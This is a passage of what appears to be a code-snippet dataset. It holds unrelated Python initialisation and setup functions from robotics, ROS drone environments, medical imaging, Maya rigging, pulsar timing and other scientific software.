RollCTC.RolloutSlidingModeController( self.R )\n \n else:\n self.Ctl = None\n \n \n if self.robot_config == 'wrist-only':\n self.Ctl.n_gears = rospy.get_param(\"n_gears\", 2 )\n self.x_d = np.array( rospy.get_param(\"goal\", [0,0] ) )\n \n elif self.robot_config == 'dual-plane' :\n self.Ctl.n_gears = rospy.get_param(\"n_gears\", 4 )\n self.x_d = np.array( rospy.get_param(\"goal\", [0.0,0.0,0.0,0.0] ) )\n #self.x_d = np.array( [-3.14 , 0 , 0 , 0] )\n \n # Gen ctl params\n self.Ctl.hysteresis = rospy.get_param(\"hysteresis\", True )\n self.Ctl.min_delay = rospy.get_param(\"min_delay\", 0.5 )\n \n self.Ctl.w0 = rospy.get_param(\"w0\", 1 )\n self.Ctl.zeta = rospy.get_param(\"zeta\", 0.7 )\n \n self.Ctl.lam = rospy.get_param(\"lam\", 1 )\n self.Ctl.nab = rospy.get_param(\"nab\", 1 )\n self.Ctl.D = rospy.get_param(\"D\", 0 )\n \n self.Ctl.horizon = rospy.get_param(\"horizon\", 0.5 )\n self.Ctl.sim_dt = rospy.get_param(\"sim_dt\", 0.1 )\n \n self.Ctl.domain_check = rospy.get_param(\"domain_check\", False )\n \n # Base policy param for roll \n if self.robot_ctl == 'RollCTC' :\n self.Ctl.FixCtl.lam = self.Ctl.lam\n \n elif self.robot_ctl == 'RollSLD' :\n self.Ctl.FixCtl.lam = self.Ctl.lam \n self.Ctl.FixCtl.nab = self.Ctl.nab \n self.Ctl.FixCtl.D = self.Ctl.D", "def __init__(self):\n ros_ws_abspath = 
rospy.get_param(\"/drone/ros_ws_abspath\", None)\n assert ros_ws_abspath is not None, \"You forgot to set ros_ws_abspath in your yaml file of your main RL script. Set ros_ws_abspath: \\'YOUR/SIM_WS/PATH\\'\"\n assert os.path.exists(ros_ws_abspath), \"The Simulation ROS Workspace path \" + ros_ws_abspath + \\\n \" DOESNT exist, execute: mkdir -p \" + ros_ws_abspath + \\\n \"/src;cd \" + ros_ws_abspath + \";catkin_make\"\n\n ROSLauncher(rospackage_name=\"drone_construct\",\n launch_file_name=\"start_world.launch\",\n ros_ws_abspath=ros_ws_abspath)\n\n # Load Params from the desired Yaml file\n LoadYamlFileParamsTest(rospackage_name=\"openai_ros\",\n rel_path_from_package_to_file=\"src/openai_ros/task_envs/parrotdrone/config\",\n yaml_file_name=\"parrotdrone_goto.yaml\")\n\n # Only variable needed to be set here\n number_actions = rospy.get_param('/drone/n_actions')\n self.action_space = spaces.Discrete(number_actions)\n\n # We set the reward range, which is not compulsory but here we do it.\n self.reward_range = (-numpy.inf, numpy.inf)\n\n # Actions and Observations\n self.linear_forward_speed = rospy.get_param(\n '/drone/linear_forward_speed')\n self.angular_turn_speed = rospy.get_param('/drone/angular_turn_speed')\n self.angular_speed = rospy.get_param('/drone/angular_speed')\n\n self.init_linear_speed_vector = Vector3()\n self.init_linear_speed_vector.x = rospy.get_param(\n '/drone/init_linear_speed_vector/x')\n self.init_linear_speed_vector.y = rospy.get_param(\n '/drone/init_linear_speed_vector/y')\n self.init_linear_speed_vector.z = rospy.get_param(\n '/drone/init_linear_speed_vector/z')\n\n self.init_angular_turn_speed = rospy.get_param(\n '/drone/init_angular_turn_speed')\n\n self.min_sonar_value = rospy.get_param('/drone/min_sonar_value')\n self.max_sonar_value = rospy.get_param('/drone/max_sonar_value')\n\n # Get WorkSpace Cube Dimensions\n self.work_space_x_max = rospy.get_param(\"/drone/work_space/x_max\")\n self.work_space_x_min = rospy.get_param(\"/drone/work_space/x_min\")\n self.work_space_y_max = rospy.get_param(\"/drone/work_space/y_max\")\n self.work_space_y_min = rospy.get_param(\"/drone/work_space/y_min\")\n self.work_space_z_max = rospy.get_param(\"/drone/work_space/z_max\")\n self.work_space_z_min = rospy.get_param(\"/drone/work_space/z_min\")\n\n # Maximum RPY values\n self.max_roll = rospy.get_param(\"/drone/max_roll\")\n self.max_pitch = rospy.get_param(\"/drone/max_pitch\")\n self.max_yaw = rospy.get_param(\"/drone/max_yaw\")\n\n # Get Desired Point to Get\n self.desired_point = Point()\n self.desired_point.x = rospy.get_param(\"/drone/desired_pose/x\")\n self.desired_point.y = rospy.get_param(\"/drone/desired_pose/y\")\n self.desired_point.z = rospy.get_param(\"/drone/desired_pose/z\")\n\n self.desired_point_epsilon = rospy.get_param(\n \"/drone/desired_point_epsilon\")\n\n # We place the Maximum and minimum values of the X,Y,Z,R,P,Yof the pose\n\n high = numpy.array([self.work_space_x_max,\n self.work_space_y_max,\n self.work_space_z_max,\n self.max_roll,\n self.max_pitch,\n self.max_yaw,\n self.max_sonar_value])\n\n low = numpy.array([self.work_space_x_min,\n self.work_space_y_min,\n self.work_space_z_min,\n -1*self.max_roll,\n -1*self.max_pitch,\n -numpy.inf,\n self.min_sonar_value])\n\n self.observation_space = spaces.Box(low, high)\n\n rospy.logdebug(\"ACTION SPACES TYPE===>\"+str(self.action_space))\n rospy.logdebug(\"OBSERVATION SPACES TYPE===>\" +\n str(self.observation_space))\n\n # Rewards\n self.closer_to_point_reward = rospy.get_param(\n 
\"/drone/closer_to_point_reward\")\n self.not_ending_point_reward = rospy.get_param(\n \"/drone/not_ending_point_reward\")\n self.end_episode_points = rospy.get_param(\"/drone/end_episode_points\")\n\n self.cumulated_steps = 0.0\n\n # Here we will add any init functions prior to starting the MyRobotEnv\n super(ParrotDroneGotoEnv, self).__init__(ros_ws_abspath)", "def __init__(self, env, action_repeat=1):\n super().__init__(env)\n if self.env.mujoco_robot.name == \"sawyer\":\n from robosuite.controllers import SawyerIKController\n\n self.controller = SawyerIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n elif self.env.mujoco_robot.name == \"baxter\":\n from robosuite.controllers import BaxterIKController\n\n self.controller = BaxterIKController(\n bullet_data_path=os.path.join(robosuite.models.assets_root, \"bullet_data\"),\n robot_jpos_getter=self._robot_jpos_getter,\n )\n else:\n raise Exception(\n \"Only Sawyer and Baxter robot environments are supported for IK \"\n \"control currently.\"\n )\n\n self.action_repeat = action_repeat", "def __init__(self, source, label_config_center, name=None, header=None, \n view_min=None, view_max=None, alpha=255, colormap='gray',\n cross_pos=None):\n if isinstance(source, np.ndarray):\n self._data = np.rot90(source)\n if name == None:\n self._name = 'new_image'\n else:\n self._name = str(name)\n if not isinstance(header, nib.nifti1.Nifti1Header):\n raise ValueError(\"Parameter header must be specified!\")\n elif header.get_data_shape() == source.shape:\n self._header = header\n self._img = None\n else:\n raise ValueError(\"Data dimension does not match.\")\n else:\n self._img = nib.load(source)\n self._header = self._img.get_header()\n basename = os.path.basename(source.strip('/'))\n self._name = re.sub(r'(.*)\\.nii(\\.gz)?', r'\\1', basename)\n self.save_mem_load()\n\n # For convenience, define a shift variable\n self._y_shift = self.get_data_shape()[1] - 1\n\n if view_min == None:\n self._view_min = self._data.min()\n else:\n self._view_min = view_min\n\n if view_max == None:\n self._view_max = self._data.max()\n else:\n self._view_max = view_max\n\n self._alpha = alpha\n self._colormap = colormap\n self._rgba_list = range(self.get_data_shape()[2])\n \n # bool status for the item\n self._visible = True\n if len(self.get_data_shape()) == 3:\n self._4d = False\n else:\n self._4d = True\n self._time_point = 0\n\n # temporal variant for OrthView\n self._cross_pos = cross_pos\n\n # define a dictionary \n self.label_config_center = label_config_center\n self.label_config_center.single_roi_view_update.connect(self.update_single_roi)\n \n # undo redo stacks\n self.undo_stack = DoStack()\n self.redo_stack = DoStack()\n\n self.update_rgba()\n if self._cross_pos:\n self.update_orth_rgba()", "def __init__(self):\n self.brainstate = {}\n\n self.export = ['run_ai']", "def setup(self):\r\n ScriptedLoadableModuleWidget.setup(self)\r\n\r\n # Load widget from .ui file (created by Qt Designer).\r\n # Additional widgets can be instantiated manually and added to self.layout.\r\n uiWidget = slicer.util.loadUI(self.resourcePath('UI/RecordHerniaData.ui'))\r\n self.layout.addWidget(uiWidget)\r\n self.ui = slicer.util.childWidgetVariables(uiWidget)\r\n\r\n # Set scene in MRML widgets. 
Make sure that in Qt designer the top-level qMRMLWidget's\r\n        # \"mrmlSceneChanged(vtkMRMLScene*)\" signal is connected to each MRML widget's\r\n        # \"setMRMLScene(vtkMRMLScene*)\" slot.\r\n        uiWidget.setMRMLScene(slicer.mrmlScene)\r\n\r\n        # Create logic class. Logic implements all computations that should be possible to run\r\n        # in batch mode, without a graphical user interface.\r\n        self.logic = TMSRecordDataModuleLogic()\r\n        self.recordingStarted = False\r\n        self.camerasStarted = False\r\n        self.moduleDir = os.path.dirname(slicer.modules.tmsrecorddatamodule.path)\r\n        self.logic.setupScene()\r\n\r\n        # Buttons\r\n        self.ui.StartStopRecordingButton.connect('clicked(bool)', self.onStartStopRecordingClicked)\r\n        self.ui.startCamerasButton.connect('clicked(bool)',self.onStartStopCamerasClicked)
self.prefix # Naming prefix. Use this for every new node you create and there should be no name clashes.\n options = self.options # Build options\n mirror_value = self.mirror_value # 1.0 for left and center sided parts and -1.0 for right sided part.\n\n mc.setAttr(self.guide_master+'.offsetTranslateY', -0.2)\n\n l_prefix = prefix.replace('C','L', 1)\n r_prefix = prefix.replace('C','R', 1)\n mirror_values = [1, -1]\n enable_steering = options.get('enableSteering')\n\n colors = ['green', 'red']\n\n for mi, prefix in enumerate([l_prefix, r_prefix]):\n\n mirror_value = mirror_values[mi]\n color = colors[mi]\n\n l_main_zero, l_main_plc = self.guide_joint('main', alt_prefix=prefix, placer_only=1)\n\n # create hub\n hub_zero, hub_plc, hub_jnt = self.guide_joint('wheelhub', alt_prefix=prefix, constraint_type='point')\n hub_end_zero, hub_end_plc, hub_end_jnt = self.guide_joint('wheelhub_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(hub_end_zero, r=1, t=[1,0,0])\n mc.parent(hub_end_jnt, hub_jnt)\n mc.aimConstraint(hub_end_plc, hub_jnt, aim=[mirror_value,0,0], u=[0,1,0], wu=[0,1,0], wut='vector')\n mc.parentConstraint(hub_plc, hub_end_zero , mo=1)\n\n # Create steering arm\n steer_zero, steer_plc, steer_jnt = self.guide_joint('steeringArm', alt_prefix=prefix, constraint_type='parent')\n mc.xform(steer_zero, r=1, t=[-1,0,0])\n mc.parent(hub_jnt, steer_jnt)\n\n # Create shocks\n shock_a_zero, shock_a_plc, shock_a_jnt = self.guide_joint('shock_A', alt_prefix=prefix, constraint_type='point')\n shock_b_zero, shock_b_plc, shock_b_jnt = self.guide_joint('shock_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(shock_a_zero, ws=1, t=[-2,2,0])\n mc.xform(shock_b_zero, ws=1, t=[-0.5,0.25,0])\n\n mc.parent(shock_b_jnt, shock_a_jnt)\n\n mc.aimConstraint(shock_b_plc, shock_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n mc.aimConstraint(shock_a_plc, shock_b_jnt, aim=[-mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n # upper arm\n up_arm_zero, up_arm_plc, up_arm_jnt = self.guide_joint('upperArm', alt_prefix=prefix, constraint_type='point')\n up_arm_end_zero, up_arm_end_plc, up_arm_end_jnt = self.guide_joint('upperArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(up_arm_end_zero, r=1, t=[-3.5,1,0])\n mc.xform(up_arm_zero, r=1, t=[-1,0.5,0])\n mc.parent(up_arm_end_jnt, up_arm_jnt)\n mc.aimConstraint(up_arm_end_plc, up_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=up_arm_plc)\n\n # lower arm\n lo_arm_zero, lo_arm_plc, lo_arm_jnt = self.guide_joint('lowerArm', alt_prefix=prefix, constraint_type='point')\n lo_arm_end_zero, lo_arm_end_plc, lo_arm_end_jnt = self.guide_joint('lowerArm_end', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(lo_arm_end_zero, r=1, t=[-4,-0.5,0])\n mc.xform(lo_arm_zero, r=1, t=[-1,-0.5,0])\n mc.parent(lo_arm_end_jnt, lo_arm_jnt)\n mc.aimConstraint(lo_arm_end_plc, lo_arm_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,mirror_value], wut='objectRotation', wuo=lo_arm_plc)\n\n # steeringArm\n if enable_steering:\n steeringArm_a_zero, steeringArm_a_plc, steeringArm_a_jnt = self.guide_joint('steeringArm_A', alt_prefix=prefix, constraint_type='point')\n steeringArm_b_zero, steeringArm_b_plc, steeringArm_b_jnt = self.guide_joint('steeringArm_B', alt_prefix=prefix, constraint_type='point')\n\n mc.xform(steeringArm_b_zero, r=1, t=[-1.5,0,1])\n mc.xform(steeringArm_a_zero, r=1, t=[-4,0,1])\n\n mc.parent(steeringArm_b_jnt, steeringArm_a_jnt)\n 
mc.aimConstraint(steeringArm_b_plc, steeringArm_a_jnt, aim=[mirror_value,0,0], u=[0,0,1], wu=[0,0,1], wut='vector')\n\n            # Create control\n            zero, ctrl = self.guide_ctrl('wheel', alt_prefix=prefix, driver=hub_end_jnt, color=color, shape='circle', axis='X', scale=[3]*3, create_pivot=0)\n            mc.setAttr(ctrl+'.numOffsetCtrls', 1)\n            mc.addAttr(ctrl+'.numOffsetCtrls', e=1, min=1)\n            mc.xform(ctrl.replace('_CTL','_A_OFF_CTL.cv[*]'), r=1, s=[0.8]*3)\n\n            control.create_shape('wheel', ctrl, axis='X', scale=[3]*3)\n\n            #suspension_zero, suspension_ctrl = self.guide_ctrl('suspension', create_pivot=0, driver=shock_a_jnt, axis='X', shape='pyramid', color=color, scale=[1.5,1,1], alt_prefix=prefix)\n            ground_zero, ground_ctrl = self.guide_ctrl('ground', create_pivot=0, shape='square', color='grass', alt_prefix=prefix)\n            mc.delete(mc.pointConstraint(hub_jnt, ground_zero))\n\n            # constrain to placer\n            childs = [prefix+'_wheelhub_JNT_PLC_ZERO',\n                      prefix+'_steeringArm_JNT_PLC_ZERO',\n                      prefix+'_shock_A_JNT_PLC_ZERO',\n                      prefix+'_shock_B_JNT_PLC_ZERO',\n                      prefix+'_upperArm_JNT_PLC_ZERO',\n                      prefix+'_upperArm_end_JNT_PLC_ZERO',\n                      prefix+'_lowerArm_JNT_PLC_ZERO',\n                      prefix+'_lowerArm_end_JNT_PLC_ZERO']\n\n            for c in childs:\n                mc.parentConstraint(l_main_plc, c, mo=1)\n\n            mc.setAttr(l_main_plc+'.offsetTranslateY', mirror_value*0.5)\n\n        # ################\n        # Place it all\n        hub_pos = mc.ls(options.get('hubCenter') or '')\n        if hub_pos:\n            loc = utils.snap_locator(hub_pos)\n            mc.delete(mc.pointConstraint(loc, self.guide_master))\n            mc.setAttr(self.guide_master+'.tx', 0)\n            mc.delete(mc.pointConstraint(loc, l_main_plc), loc)\n\n            hub_end_pos = mc.ls(options.get('hubEndCenter') or '')\n            if hub_end_pos:\n                loc = utils.snap_locator(hub_end_pos)\n                mc.delete(mc.pointConstraint(loc, hub_end_plc), loc)\n\n        else:\n            mc.xform(self.guide_master, ws=1, t=[0,2,10])\n            mc.xform(l_main_plc, r=1, t=[mirror_value*6,0,0])\n\n        mc.setAttr(self.guide_master+'.jointAxisVis', 1)\n\n        l = utils.snap_locator(hub_jnt)\n        mc.setAttr(l+'.ty', 0)\n        mc.delete(mc.pointConstraint(l, ground_zero), l)\n\n        chassis_plc_zero, chassis_plc = self.guide_joint('chassis_driver', placer_only=1)\n        mc.setAttr(chassis_plc+'.radius', 1)\n        mc.setAttr(chassis_plc+'.color', 0.96, 0.71, .01)\n        mc.setAttr(chassis_plc+'.otherType', 'Leg IK Driver', type='string');\n        mc.setAttr(chassis_plc+'.type', 18)\n\n        mc.pointConstraint(l_prefix+'_lowerArm_end_JNT_PLC', r_prefix+'_lowerArm_end_JNT_PLC', chassis_plc_zero)\n        utils.set_attrs(chassis_plc, l=1, k=0)\n\n        # This finalizes your guide.\n        self.finalize_guide()\n        self.mirror_guide()
self.__dict__['psrlist'] = []\n print('Using all available pulsars from .par/.tim directory')\n if 'psrcachefile' not in self.__dict__:\n self.psrcachefile = None\n if 'tm' not in self.__dict__:\n self.tm = 'default'\n print('Setting a default linear timing model')\n if 'inc_events' not in self.__dict__:\n self.inc_events = True\n print('Including transient events to specific pulsar models')\n if 'fref' not in self.__dict__:\n self.fref = 1400 # MHz\n print('Setting reference radio frequency to 1400 MHz')\n if 'mcmc_covm_csv' in self.__dict__ and os.path.isfile(self.mcmc_covm_csv):\n print('MCMC jump covariance matrix is available')\n self.__dict__['mcmc_covm'] = pd.read_csv(self.mcmc_covm_csv, index_col=0)\n else:\n self.__dict__['mcmc_covm'] = None\n # Copying default priors from StandardModels/CustomModels object\n # Priors are chosen not to be model-specific because HyperModel\n # (which is the only reason to have multiple models) does not support\n # different priors for different models\n for prior_key, prior_default in self.noise_model_obj().priors.items():\n if prior_key not in self.__dict__.keys():\n self.__dict__[prior_key] = prior_default\n\n # Model-dependent parameters\n for mkey in self.models:\n\n self.models[mkey].modeldict = dict()\n\n print('------------------')", "def set_up_scenes():\n cmd.zoom('Cathepsin', 10) # Zoom out to get a view on the whole complex\n cmd.scene('001', 'store', message='This is the first scene with a view on the complex!')\n cmd.set_view(closeup) # Get a close-up of the ligand by using the manually chosen viewpoint\n cmd.scene('002', 'store', message='This is the second scene with a close-up on the ligand!')", "def setup_populated_instr_McXtrace():\n instr = setup_instr_root_path_McXtrace()\n\n instr.add_parameter(\"double\", \"theta\")\n instr.add_parameter(\"double\", \"has_default\", value=37)\n instr.add_declare_var(\"double\", \"two_theta\")\n instr.append_initialize(\"two_theta = 2.0*theta;\")\n\n instr.add_component(\"first_component\", \"test_for_reading\")\n instr.add_component(\"second_component\", \"test_for_reading\")\n instr.add_component(\"third_component\", \"test_for_reading\")\n\n return instr", "def set_parameters(self, args):\n self.args = args\n\n if args.testing:\n self.delay_close()\n\n if args.source == \"simulation\":\n log.info(\"Create simulated spectra device\")\n self.dev = simulation.SimulatedSpectraDevice()\n\n elif args.source == \"sled\":\n log.info(\"Create single sled cobra\")\n self.dev = simulation.SimulatedCobraSLED()\n\n elif args.source == \"cobra\":\n log.info(\"Create DALSA cobra device\")\n #self.dev = devices.DalsaCobraDevice()\n self.dev = DALSA.Cobra()\n\n elif args.source == \"opto\":\n log.info(\"Create OPTO sensor cobra device\")\n self.dev = DALSA.OPTOCobra()\n\n elif args.source == \"basler\":\n log.info(\"Create DALSA basler device\")\n #self.dev = devices.DalsaBaslerDevice()\n self.dev = DALSA.BaslerSprint4K()\n\n self.dev.setup_pipe()\n self.setup_pipe_timer()", "def __init__(self):\r\n ScriptedLoadableModuleLogic.__init__(self)\r\n self.rgbport = 18944\r\n self.depthPort = 18945", "def __init__(self, io, default_camera='right'):\n parts.part.ReachyPart.__init__(self, name='head', io=io)\n\n #self.neck = self.create_orbita_actuator('neck', Head.orbita_config)\n self.attach_dxl_motors(parts.Head.dxl_motors)\n #self.camera = self.io.find_dual_camera(default_camera)", "def __set_control_elements(*args):\n args[0].Controls.valve_number = args[1]\n args[0].Controls.set_valve_number()\n 
args[0].Controls.go_elements = args[2]\n args[0].Controls.set_go_elements()", "def import_control_section(self, filename_suffix='run'):\n pass", "def __setup_ui_controls(self, list_of_names):\n\n ##################################################\n self.scene.append_to_caption('<h3>Scene Settings</h3>\\n')\n # Button to reset camera\n reset_button = button(\n bind=self.__reset_camera, text=\"Reset Camera\")\n self.__ui_controls.btn_reset = reset_button\n self.scene.append_to_caption('\\t')\n\n screenshot_button = button(bind=self.__screenshot, text=\"Take Screenshot\")\n self.__ui_controls.btn_ss = screenshot_button\n self.scene.append_to_caption('\\n')\n\n camera_lock_checkbox = checkbox(bind=self.__camera_lock_checkbox, text=\"Camera Lock\",\n checked=self.__camera_lock)\n self.__ui_controls.chkbox_cam = camera_lock_checkbox\n self.scene.append_to_caption('\\t')\n\n grid_relative_checkbox = checkbox(\n bind=self.__grid_relative_checkbox,\n text=\"Grid Relative\", checked=self.__grid_relative)\n self.__ui_controls.chkbox_rel = grid_relative_checkbox\n\n self.scene.append_to_caption('\\t')\n # Checkbox for grid visibility\n checkbox_grid_visibility = checkbox(\n bind=self.__grid_visibility_checkbox, text=\"Grid Visibility\",\n checked=self.__grid_visibility)\n self.__ui_controls.chkbox_grid = checkbox_grid_visibility\n self.scene.append_to_caption('\\n')\n\n ##################################################\n self.scene.append_to_caption('<h3>Robot</h3>\\n')\n # Drop down for robots / joints in frame\n menu_robots_list = menu(bind=self.__menu_item_chosen, choices=list_of_names)\n if not len(list_of_names) == 0:\n menu_robots_list.index = self.__selected_robot\n self.__ui_controls.menu_robots = menu_robots_list\n self.scene.append_to_caption('\\t')\n\n # Button to delete the selected robot\n delete_button = button(bind=self.__del_robot, text=\"Delete Robot\")\n self.__ui_controls.btn_del = delete_button\n self.scene.append_to_caption('\\t')\n\n # Button to clear the robots in screen\n clear_button = button(bind=self.clear_scene, text=\"Clear Scene\")\n self.__ui_controls.btn_clr = clear_button\n self.scene.append_to_caption('\\n')\n\n ##################################################\n self.scene.append_to_caption('<h3>Characteristics</h3>\\n')\n # Checkbox for reference frame visibilities\n if len(self.__robots) == 0:\n reference_checkbox = checkbox(\n bind=self.__reference_frame_checkbox,\n text=\"Show Reference Frames\", checked=True)\n else:\n chk = self.__robots[self.__selected_robot].ref_shown\n reference_checkbox = checkbox(\n bind=self.__reference_frame_checkbox,\n text=\"Show Reference Frames\", checked=chk)\n self.__ui_controls.chkbox_ref = reference_checkbox\n self.scene.append_to_caption('\\t')\n\n # Checkbox for robot visibility\n if len(self.__robots) == 0:\n robot_vis_checkbox = checkbox(\n bind=self.__robot_visibility_checkbox,\n text=\"Show Robot\", checked=True)\n else:\n chk = self.__robots[self.__selected_robot].rob_shown\n robot_vis_checkbox = checkbox(\n bind=self.__robot_visibility_checkbox,\n text=\"Show Robot\", checked=chk)\n self.__ui_controls.chkbox_rob = robot_vis_checkbox\n self.scene.append_to_caption('\\n')\n\n # Slider for robot opacity\n self.scene.append_to_caption('Robot Opacity:')\n if len(self.__robots) == 0:\n opacity_slider = slider(bind=self.__opacity_slider, value=1)\n else:\n opc = self.__robots[self.__selected_robot].opacity\n opacity_slider = slider(bind=self.__opacity_slider, value=opc)\n self.__ui_controls.sld_opc = opacity_slider\n 
self.scene.append_to_caption('\\n')\n\n ##################################################\n # Control manual\n controls_str = '<h3>Controls</h3><br>' \\\n '<b>PAN</b><br>' \\\n 'W , S | <i>forward / backward</i><br>' \\\n 'A , D | <i>left / right</i><br>' \\\n 'SPACE , SHIFT | <i>up / down</i><br>' \\\n '<b>ROTATE</b><br>' \\\n 'CTRL + LMB | <i>free spin</i><br>' \\\n 'ARROWS KEYS | <i>rotate direction</i><br>' \\\n 'Q , E | <i>roll left / right</i><br>' \\\n '<b>ZOOM</b></br>' \\\n 'MOUSEWHEEL | <i>zoom in / out</i>'\n\n self.scene.append_to_caption(controls_str)", "def import_forward(self):\n self.import_property('OG')\n self.import_property('IBU')\n self.import_property('ABV')\n self.import_property('SRM')", "def __init__(self, settings, name, linear_scaling_factor=0.1, angular_scaling_factor=0.1):\n super(ArmControlInterpreter, self).__init__(rate=0.033)\n\n self.settings = settings\n\n self.linear_scaling_factor = linear_scaling_factor\n self.angular_scaling_factor = angular_scaling_factor\n\n self.arm_velocity_client = actionlib.SimpleActionClient('/arm_controller/velocity', rose_arm_controller_msgs.msg.set_velocityAction)\n self.arm_gripper_client = actionlib.SimpleActionClient('/arm_controller/gripper_width', rose_arm_controller_msgs.msg.set_gripper_widthAction)\n\n self.arm_name = name\n\n self.velocity_goal = set_velocityGoal()\n self.gripper_goal = set_gripper_widthGoal()\n\n self.gripper_width = ArmControlInterpreter.gripper_open\n self.open_close_toggle = self.settings[\"open_close\"]", "def __init__(self):\n self.label = \"RAPID Tools\"\n self.alias = \"RAPIDTools\"\n\n # List of tool classes associated with this toolbox\n self.tools = [AddSPTFields,\n AutomaticRAPIDfileGenerator, \n CopyDataToServer,\n CreateNetworkConnectivityFile,\n CreateNetworkConnectivityFileNHDPlus,\n CreateMuskingumParameterFiles,\n CreateMuskingumKFile,\n CreateMuskingumKfacFile,\n CreateMuskingumXField, \n CreateMuskingumXFile, \n CreateRivIDGageFile, \n CreateSubsetFile,\n CreateWeightTableFromWRFGeogrid,\n CreateInflowFileFromWRFHydroRunoff,\n CreateWeightTableFromECMWFRunoff,\n CreateInflowFileFromECMWFRunoff,\n CreateWeightTableFromLDASRunoff,\n CreateWeightTableFrom2DLatLonRunoff,\n CreateDischargeTable,\n CreateDischargeMap,\n FlowlineToPoint,\n DEMtoStreamNetwork,\n PublishDischargeMap,\n StreamNetworktoRAPID,\n StreamNetworktoSPT,\n UpdateWeightTable,\n UpdateDischargeMap,\n ]", "def __init__(self, root, annFile, feature_file, caption_idx):\n\t\timport torch\n\n\t\tsuper().__init__(root, annFile)\n\t\tself.features = torch.load(feature_file, map_location='cpu')\n\t\tself.caption_idx = caption_idx", "def zero_target(*args):\n robots = get_robot_roots()\n if not robots:\n pm.warning('Nothing Selected; Select a valid robot')\n return\n\n try:\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n ik_mode = pm.getAttr(target_ctrl_path + '.ik')\n\n if ik_mode:\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.translate', 0, 0, 0)\n pm.setAttr(tool_ctrl_path + '.rotate', 0, 0, 0)\n else:\n pm.setAttr(target_ctrl_path + '.translate', 0, 0, 0)\n pm.setAttr(target_ctrl_path + '.rotate', 0, 0, 0)\n else:\n a1_fk_ctrl_path = format_path(__A1_FK_CTRL_PATH, robot)\n a2_fk_ctrl_path = format_path(__A2_FK_CTRL_PATH, robot)\n a3_fk_ctrl_path = format_path(__A3_FK_CTRL_PATH, robot)\n a4_fk_ctrl_path = format_path(__A4_FK_CTRL_PATH, robot)\n a5_fk_ctrl_path = format_path(__A5_FK_CTRL_PATH, robot)\n a6_fk_ctrl_path = 
format_path(__A6_FK_CTRL_PATH, robot)\n\n pm.setAttr(a1_fk_ctrl_path + '.rotateY', 0)\n pm.setAttr(a2_fk_ctrl_path + '.rotateX', 0)\n pm.setAttr(a3_fk_ctrl_path + '.rotateX', 0)\n pm.setAttr(a4_fk_ctrl_path + '.rotateZ', 0)\n pm.setAttr(a5_fk_ctrl_path + '.rotateX', 0)\n pm.setAttr(a6_fk_ctrl_path + '.rotateZ', 0)\n except:\n pm.warning('Cannot zero target')", "def __init__(self, meta: SceneDescription):\n super().__init__(meta)\n self.scenes = []\n self.nodes = []\n self.meshes = []\n self.materials = []\n self.images = []\n self.samplers = []\n self.textures = []\n\n self.path = None\n self.scene = None\n self.gltf = None", "def __init__(self, qasmsourcelines,\n name='main',\n filepath=None,\n no_unknown=False,\n save_pgm_source=False, save_element_source=False,\n save_gate_source=False,\n show_gate_decls=False,\n include_path='.'):\n\n # Control factors\n self.no_unknown = no_unknown\n self.save_pgm_source = save_pgm_source\n self.save_element_source = save_element_source\n self.save_gate_source = save_gate_source\n self.show_gate_decls = show_gate_decls\n self.include_path = include_path\n\n # Init sections\n self.t_sect = T_Sect(name)\n self.c_sect = C_Sect()\n self.g_sect = G_Sect()\n\n if save_pgm_source is None:\n self.s_sect = None\n else:\n self.s_sect = S_Sect()\n\n self.translation = {\n 't_sect': self.t_sect.t_sect,\n 'c_sect': self.c_sect.c_sect,\n 'g_sect': self.g_sect.g_sect,\n 's_sect': self.s_sect.s_sect\n }\n\n # Prepare to process initial source\n self.source_frame_stack = Source_Frame_Stack()\n self.push_source(filepath, qasmsourcelines)", "def __init__(self):\n self.label = \"Data Assistant\"\n self.alias = \"dla\"\n\n # List of tool classes associated with this toolbox\n self.tools = [Append, Stage, NewFile, Preview, Replace]", "def _setup_pipeline_cfg(self):", "def setupConnections(self):\n self.T1Button.connect('clicked(bool)', self.onApplyButton)\n self.RViewButton.connect('clicked(bool)', self.onApplyRViewButton)\n self.CheckButton.connect('stateChanged(int)', self.onCheckbuttonChecked)\n self.LLE_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectLLENode)\n self.LLN_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectLLNNode)\n self.Aref_Selector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.onSelectArefNode)\n\n self.ThSlider_LLE.Slider.connect(\"positionsChanged(double,double)\",self.ThSlider_LLE.onSliderChanged)\n self.ThSlider_LLE.SpinBoxL.connect(\"valueChanged(int)\", self.ThSlider_LLE.onSpinBoxLChanged)\n self.ThSlider_LLE.SpinBoxR.connect(\"valueChanged(int)\", self.ThSlider_LLE.onSpinBoxRChanged)\n \n self.ThSlider_LLN.Slider.connect(\"positionsChanged(double,double)\",self.ThSlider_LLN.onSliderChanged)\n self.ThSlider_LLN.SpinBoxL.connect(\"valueChanged(int)\", self.ThSlider_LLN.onSpinBoxLChanged)\n self.ThSlider_LLN.SpinBoxR.connect(\"valueChanged(int)\", self.ThSlider_LLN.onSpinBoxRChanged) \n\n self.ThSlider_ECV.Slider.connect(\"positionsChanged(double,double)\",self.ThSlider_ECV.onSliderChanged)\n self.ThSlider_ECV.SpinBoxL.connect(\"valueChanged(int)\", self.ThSlider_ECV.onSpinBoxLChanged)\n self.ThSlider_ECV.SpinBoxR.connect(\"valueChanged(int)\", self.ThSlider_ECV.onSpinBoxRChanged)\n \n self.Stats.segmentationSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.Stats.onScalarSelectorChanged)\n self.Stats.scalarSelector.connect(\"currentNodeChanged(vtkMRMLNode*)\", self.Stats.onScalarSelectorChanged)\n 